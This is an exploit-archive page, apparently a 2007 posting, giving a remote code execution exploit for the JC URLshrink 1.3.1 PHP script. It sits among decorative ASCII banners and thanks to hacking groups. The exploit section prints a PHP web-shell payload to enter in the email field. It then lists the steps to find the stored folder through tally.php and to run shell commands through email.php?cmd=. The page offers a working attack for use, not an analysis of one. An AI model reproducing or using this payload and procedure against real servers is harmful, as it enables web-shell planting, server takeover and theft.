JC URLshrink 1.3.1 Remote Code Execution Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : JC URLshrink 1.3.1 Remote Code Execution Vulnerability
# Published : 2007-03-30
# Author : Dj7xpl
# Previous Title : XOOPS Module Tutoriais (viewcat.php) Remote SQL Injection Exploit
# Next Title : XOOPS Module Repository (viewcat.php) Remote SQL Injection Exploit
.-""""""""-.                                 
                                                         /   Dj7xpl                                 
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  o_)( |                                     
                                                        |/     /     |                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) _________|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-IIIIII/-|________________________________>
                                               )_/                  / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
+
+                            /*************************__I N F O__**************************
+			     |*                                                            *|
+                            |*                     U R L S H R I N K                      *|
+                            |*                                                            *|
+                            |*  Portal:    Urlshrink                                      *|
+                            |*  Version:   1.3.1                                          *|
+			     |*  Release:   26-07-2006                                     *|
+                            |*  www:       www.developers.jccorp.net                      *|
+                            |*  Author:    Dj7xpl  | Dj7xpl@yahoo.com                     *|
+                            |*                                                            *|
+                            **************************************************************/
+_______________________________________________________________________________________________________________________+



+________________________________________________________E X P L O I T__________________________________________________+
+
+
+                         E X P L O I T - -
+                         --------------
+
+                               1) Insert Bad Code
+							
+					[X] Enter Your URL to shrink:   (Enter Random Url)  E.g : milw0m.com
+					[X] Enter your Email Address:   (Enter Bad Code)    E.g : <?php passthru($_GET[cmd]);?> 
+					
+					
+					
+			        2) See Folder Name
+
+					[X] http://[Target]/[Path]/data/tally.php
+					[X] http://localhost/urlshrink/data/tally.php       E.g : 5
+					
+					
+					
+			        3) Visit Your Code
+					
+					[X] http://localhost/urlshrink/[Folder Name]/email.php  
+					    E.g : http://localhost/urlshrink/5/email.php?cmd=ls -la 
+
+
+		                  
+					
+_______________________________________________________________________________________________________________________+


+___________________________________________________________T N X_______________________________________________________+
+
+
+          Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org, Simorgh .............
+		   
+_______________________________________________________________________________________________________________________+

# www.Syue.com [2007-03-30]